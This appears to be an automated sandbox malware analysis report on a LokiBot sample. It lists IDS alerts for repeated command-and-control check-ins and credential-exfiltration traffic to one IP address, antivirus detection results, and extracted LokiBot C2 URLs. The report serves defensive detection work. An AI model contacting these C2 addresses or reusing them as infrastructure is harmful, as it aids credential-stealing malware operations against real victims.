                2025-01-11T08:37:31.243472+010028257661Malware Command and Control Activity Detected192.168.2.94991194.156.177.4180TCP
                2025-01-11T08:37:32.132348+010028257661Malware Command and Control Activity Detected192.168.2.94991794.156.177.4180TCP
                2025-01-11T08:37:33.035370+010028257661Malware Command and Control Activity Detected192.168.2.94992394.156.177.4180TCP
                2025-01-11T08:37:33.901353+010028257661Malware Command and Control Activity Detected192.168.2.94992994.156.177.4180TCP
                2025-01-11T08:37:34.780300+010028257661Malware Command and Control Activity Detected192.168.2.94993894.156.177.4180TCP
                2025-01-11T08:37:35.656565+010028257661Malware Command and Control Activity Detected192.168.2.94994694.156.177.4180TCP
                2025-01-11T08:37:36.542434+010028257661Malware Command and Control Activity Detected192.168.2.94995294.156.177.4180TCP
                2025-01-11T08:37:37.413981+010028257661Malware Command and Control Activity Detected192.168.2.94995894.156.177.4180TCP
                2025-01-11T08:37:38.278632+010028257661Malware Command and Control Activity Detected192.168.2.94996494.156.177.4180TCP
                2025-01-11T08:37:39.298255+010028257661Malware Command and Control Activity Detected192.168.2.94997294.156.177.4180TCP
                2025-01-11T08:37:40.160259+010028257661Malware Command and Control Activity Detected192.168.2.94998094.156.177.4180TCP
                2025-01-11T08:37:41.027625+010028257661Malware Command and Control Activity Detected192.168.2.94998794.156.177.4180TCP
                2025-01-11T08:37:41.877046+010028257661Malware Command and Control Activity Detected192.168.2.94999394.156.177.4180TCP
                2025-01-11T08:37:42.766186+010028257661Malware Command and Control Activity Detected192.168.2.94999994.156.177.4180TCP
                2025-01-11T08:37:43.647766+010028257661Malware Command and Control Activity Detected192.168.2.95000694.156.177.4180TCP
                2025-01-11T08:37:44.509809+010028257661Malware Command and Control Activity Detected192.168.2.95000994.156.177.4180TCP
                2025-01-11T08:37:45.351886+010028257661Malware Command and Control Activity Detected192.168.2.95001094.156.177.4180TCP
                2025-01-11T08:37:46.247938+010028257661Malware Command and Control Activity Detected192.168.2.95001194.156.177.4180TCP
                2025-01-11T08:37:47.141186+010028257661Malware Command and Control Activity Detected192.168.2.95001294.156.177.4180TCP
                2025-01-11T08:37:47.993044+010028257661Malware Command and Control Activity Detected192.168.2.95001394.156.177.4180TCP
                2025-01-11T08:37:48.851758+010028257661Malware Command and Control Activity Detected192.168.2.95001494.156.177.4180TCP
                2025-01-11T08:37:49.710358+010028257661Malware Command and Control Activity Detected192.168.2.95001594.156.177.4180TCP
                2025-01-11T08:37:50.589002+010028257661Malware Command and Control Activity Detected192.168.2.95001694.156.177.4180TCP
                2025-01-11T08:37:51.533742+010028257661Malware Command and Control Activity Detected192.168.2.95001794.156.177.4180TCP
                2025-01-11T08:37:52.420648+010028257661Malware Command and Control Activity Detected192.168.2.95001894.156.177.4180TCP
                2025-01-11T08:37:53.281289+010028257661Malware Command and Control Activity Detected192.168.2.95001994.156.177.4180TCP
                2025-01-11T08:37:54.149795+010028257661Malware Command and Control Activity Detected192.168.2.95002094.156.177.4180TCP
                2025-01-11T08:37:55.447402+010028257661Malware Command and Control Activity Detected192.168.2.95002194.156.177.4180TCP
                2025-01-11T08:37:56.296589+010028257661Malware Command and Control Activity Detected192.168.2.95002294.156.177.4180TCP
                2025-01-11T08:37:57.168024+010028257661Malware Command and Control Activity Detected192.168.2.95002394.156.177.4180TCP
                2025-01-11T08:37:58.108290+010028257661Malware Command and Control Activity Detected192.168.2.95002494.156.177.4180TCP
                2025-01-11T08:37:58.997732+010028257661Malware Command and Control Activity Detected192.168.2.95002594.156.177.4180TCP
                2025-01-11T08:37:59.881352+010028257661Malware Command and Control Activity Detected192.168.2.95002794.156.177.4180TCP
                2025-01-11T08:38:00.923865+010028257661Malware Command and Control Activity Detected192.168.2.95002894.156.177.4180TCP
                2025-01-11T08:38:01.801642+010028257661Malware Command and Control Activity Detected192.168.2.95002994.156.177.4180TCP
                2025-01-11T08:38:02.929554+010028257661Malware Command and Control Activity Detected192.168.2.95003094.156.177.4180TCP
                2025-01-11T08:38:03.788440+010028257661Malware Command and Control Activity Detected192.168.2.95003194.156.177.4180TCP
                2025-01-11T08:38:04.654751+010028257661Malware Command and Control Activity Detected192.168.2.95003294.156.177.4180TCP
                2025-01-11T08:38:05.736766+010028257661Malware Command and Control Activity Detected192.168.2.95003394.156.177.4180TCP
                2025-01-11T08:38:06.637553+010028257661Malware Command and Control Activity Detected192.168.2.95003494.156.177.4180TCP
                2025-01-11T08:38:07.543493+010028257661Malware Command and Control Activity Detected192.168.2.95003594.156.177.4180TCP
                2025-01-11T08:38:08.535138+010028257661Malware Command and Control Activity Detected192.168.2.95003694.156.177.4180TCP
                2025-01-11T08:38:09.430836+010028257661Malware Command and Control Activity Detected192.168.2.95003794.156.177.4180TCP
                2025-01-11T08:38:10.296978+010028257661Malware Command and Control Activity Detected192.168.2.95003894.156.177.4180TCP
                2025-01-11T08:38:11.151744+010028257661Malware Command and Control Activity Detected192.168.2.95003994.156.177.4180TCP
                2025-01-11T08:38:12.040089+010028257661Malware Command and Control Activity Detected192.168.2.95004094.156.177.4180TCP
                2025-01-11T08:38:12.949663+010028257661Malware Command and Control Activity Detected192.168.2.95004194.156.177.4180TCP
                2025-01-11T08:38:13.842179+010028257661Malware Command and Control Activity Detected192.168.2.95004294.156.177.4180TCP
                2025-01-11T08:38:14.714006+010028257661Malware Command and Control Activity Detected192.168.2.95004394.156.177.4180TCP
                2025-01-11T08:38:15.727832+010028257661Malware Command and Control Activity Detected192.168.2.95004494.156.177.4180TCP
                2025-01-11T08:38:16.602139+010028257661Malware Command and Control Activity Detected192.168.2.95004594.156.177.4180TCP
                2025-01-11T08:38:17.480431+010028257661Malware Command and Control Activity Detected192.168.2.95004694.156.177.4180TCP
                2025-01-11T08:38:18.361971+010028257661Malware Command and Control Activity Detected192.168.2.95004794.156.177.4180TCP
                2025-01-11T08:38:19.243600+010028257661Malware Command and Control Activity Detected192.168.2.95004894.156.177.4180TCP
                2025-01-11T08:38:20.125882+010028257661Malware Command and Control Activity Detected192.168.2.95004994.156.177.4180TCP
                2025-01-11T08:38:21.374944+010028257661Malware Command and Control Activity Detected192.168.2.95005094.156.177.4180TCP
                2025-01-11T08:38:22.229791+010028257661Malware Command and Control Activity Detected192.168.2.95005194.156.177.4180TCP
                2025-01-11T08:38:23.088593+010028257661Malware Command and Control Activity Detected192.168.2.95005294.156.177.4180TCP
                2025-01-11T08:38:24.220880+010028257661Malware Command and Control Activity Detected192.168.2.95005394.156.177.4180TCP
                2025-01-11T08:38:25.073323+010028257661Malware Command and Control Activity Detected192.168.2.95005494.156.177.4180TCP
                2025-01-11T08:38:25.957719+010028257661Malware Command and Control Activity Detected192.168.2.95005594.156.177.4180TCP
                2025-01-11T08:38:26.972510+010028257661Malware Command and Control Activity Detected192.168.2.95005694.156.177.4180TCP
                2025-01-11T08:38:27.976208+010028257661Malware Command and Control Activity Detected192.168.2.95005794.156.177.4180TCP
                2025-01-11T08:38:28.837379+010028257661Malware Command and Control Activity Detected192.168.2.95005894.156.177.4180TCP
                2025-01-11T08:38:29.840822+010028257661Malware Command and Control Activity Detected192.168.2.95005994.156.177.4180TCP
                2025-01-11T08:38:30.693073+010028257661Malware Command and Control Activity Detected192.168.2.95006094.156.177.4180TCP
                2025-01-11T08:38:31.577126+010028257661Malware Command and Control Activity Detected192.168.2.95006194.156.177.4180TCP
                2025-01-11T08:38:32.460501+010028257661Malware Command and Control Activity Detected192.168.2.95006294.156.177.4180TCP
                2025-01-11T08:38:33.646503+010028257661Malware Command and Control Activity Detected192.168.2.95006394.156.177.4180TCP
                2025-01-11T08:38:34.530472+010028257661Malware Command and Control Activity Detected192.168.2.95006494.156.177.4180TCP
                2025-01-11T08:38:35.510279+010028257661Malware Command and Control Activity Detected192.168.2.95006594.156.177.4180TCP
                2025-01-11T08:38:36.471295+010028257661Malware Command and Control Activity Detected192.168.2.95006694.156.177.4180TCP
                2025-01-11T08:38:37.336378+010028257661Malware Command and Control Activity Detected192.168.2.95006794.156.177.4180TCP
                2025-01-11T08:38:38.202393+010028257661Malware Command and Control Activity Detected192.168.2.95006894.156.177.4180TCP
                2025-01-11T08:38:39.238877+010028257661Malware Command and Control Activity Detected192.168.2.95006994.156.177.4180TCP
                2025-01-11T08:38:40.130128+010028257661Malware Command and Control Activity Detected192.168.2.95007094.156.177.4180TCP
                2025-01-11T08:38:41.012348+010028257661Malware Command and Control Activity Detected192.168.2.95007194.156.177.4180TCP
                2025-01-11T08:38:41.968094+010028257661Malware Command and Control Activity Detected192.168.2.95007294.156.177.4180TCP
                2025-01-11T08:38:42.823353+010028257661Malware Command and Control Activity Detected192.168.2.95007394.156.177.4180TCP
                2025-01-11T08:38:43.698121+010028257661Malware Command and Control Activity Detected192.168.2.95007494.156.177.4180TCP
                2025-01-11T08:38:44.595801+010028257661Malware Command and Control Activity Detected192.168.2.95007594.156.177.4180TCP
                2025-01-11T08:38:45.627870+010028257661Malware Command and Control Activity Detected192.168.2.95007694.156.177.4180TCP
                2025-01-11T08:38:46.516711+010028257661Malware Command and Control Activity Detected192.168.2.95007794.156.177.4180TCP
                2025-01-11T08:38:47.424671+010028257661Malware Command and Control Activity Detected192.168.2.95007894.156.177.4180TCP
                2025-01-11T08:38:48.273476+010028257661Malware Command and Control Activity Detected192.168.2.95007994.156.177.4180TCP
                2025-01-11T08:38:49.116902+010028257661Malware Command and Control Activity Detected192.168.2.95008094.156.177.4180TCP
                2025-01-11T08:38:49.960016+010028257661Malware Command and Control Activity Detected192.168.2.95008194.156.177.4180TCP
                2025-01-11T08:38:50.825321+010028257661Malware Command and Control Activity Detected192.168.2.95008294.156.177.4180TCP
                2025-01-11T08:38:51.695758+010028257661Malware Command and Control Activity Detected192.168.2.95008394.156.177.4180TCP
                2025-01-11T08:38:52.555444+010028257661Malware Command and Control Activity Detected192.168.2.95008494.156.177.4180TCP
                2025-01-11T08:38:53.414347+010028257661Malware Command and Control Activity Detected192.168.2.95008594.156.177.4180TCP
                2025-01-11T08:38:54.273813+010028257661Malware Command and Control Activity Detected192.168.2.95008694.156.177.4180TCP
                2025-01-11T08:38:55.134435+010028257661Malware Command and Control Activity Detected192.168.2.95008794.156.177.4180TCP
                2025-01-11T08:38:56.036472+010028257661Malware Command and Control Activity Detected192.168.2.95008894.156.177.4180TCP
                2025-01-11T08:38:56.987645+010028257661Malware Command and Control Activity Detected192.168.2.95008994.156.177.4180TCP
                2025-01-11T08:38:57.870196+010028257661Malware Command and Control Activity Detected192.168.2.95009094.156.177.4180TCP
                2025-01-11T08:38:58.710492+010028257661Malware Command and Control Activity Detected192.168.2.95009194.156.177.4180TCP
                2025-01-11T08:38:59.655514+010028257661Malware Command and Control Activity Detected192.168.2.95009294.156.177.4180TCP
                2025-01-11T08:39:00.512250+010028257661Malware Command and Control Activity Detected192.168.2.95009394.156.177.4180TCP
                2025-01-11T08:39:01.365444+010028257661Malware Command and Control Activity Detected192.168.2.95009494.156.177.4180TCP
                2025-01-11T08:39:02.473916+010028257661Malware Command and Control Activity Detected192.168.2.95009594.156.177.4180TCP
                2025-01-11T08:39:03.353242+010028257661Malware Command and Control Activity Detected192.168.2.95009694.156.177.4180TCP
                2025-01-11T08:39:04.211638+010028257661Malware Command and Control Activity Detected192.168.2.95009794.156.177.4180TCP
                2025-01-11T08:39:05.111899+010028257661Malware Command and Control Activity Detected192.168.2.95009894.156.177.4180TCP
                2025-01-11T08:39:06.002182+010028257661Malware Command and Control Activity Detected192.168.2.95009994.156.177.4180TCP
                2025-01-11T08:39:06.979552+010028257661Malware Command and Control Activity Detected192.168.2.95010094.156.177.4180TCP
                2025-01-11T08:39:07.899333+010028257661Malware Command and Control Activity Detected192.168.2.95010194.156.177.4180TCP
                2025-01-11T08:39:08.814632+010028257661Malware Command and Control Activity Detected192.168.2.95010294.156.177.4180TCP
                2025-01-11T08:39:09.685224+010028257661Malware Command and Control Activity Detected192.168.2.95010394.156.177.4180TCP
                2025-01-11T08:39:10.558443+010028257661Malware Command and Control Activity Detected192.168.2.95010494.156.177.4180TCP
                2025-01-11T08:39:11.462948+010028257661Malware Command and Control Activity Detected192.168.2.95010594.156.177.4180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: kzQ25HVUbf.exeAvira: detected
                Source: http://94.156.177.41/soja/five/fre.phpAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeAvira: detection malicious, Label: HEUR/AGEN.1309499
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeReversingLabs: Detection: 65%
                Source: kzQ25HVUbf.exeReversingLabs: Detection: 65%
                Source: kzQ25HVUbf.exeVirustotal: Detection: 73%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeJoe Sandbox ML: detected
                Source: kzQ25HVUbf.exeJoe Sandbox ML: detected
                Source: kzQ25HVUbf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: kzQ25HVUbf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: DJsZ.pdb source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr
                Source: Binary string: DJsZ.pdbSHA256p source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.9:49804 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49828 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49848 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49848 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49876 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49828 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49848 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.9:49811 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49876 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49828 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49848 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49828 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49834 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49911 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49870 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49895 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49911 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49870 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49870 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49911 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49923 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49911 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49895 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49895 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49870 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49904 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49904 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49904 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49923 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49917 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49817 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49904 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49817 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49817 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49895 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49923 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49952 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49929 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49929 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49929 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49923 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49817 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49929 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49972 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49972 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49980 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49980 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49980 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49917 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49917 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49876 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50018 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50006 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50006 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50018 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49980 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49876 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49972 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50024 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50023 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50023 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50023 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50018 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50020 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50006 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50024 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50010 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50032 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50010 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50024 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50020 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50010 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50038 -> 94.156.177.41:80
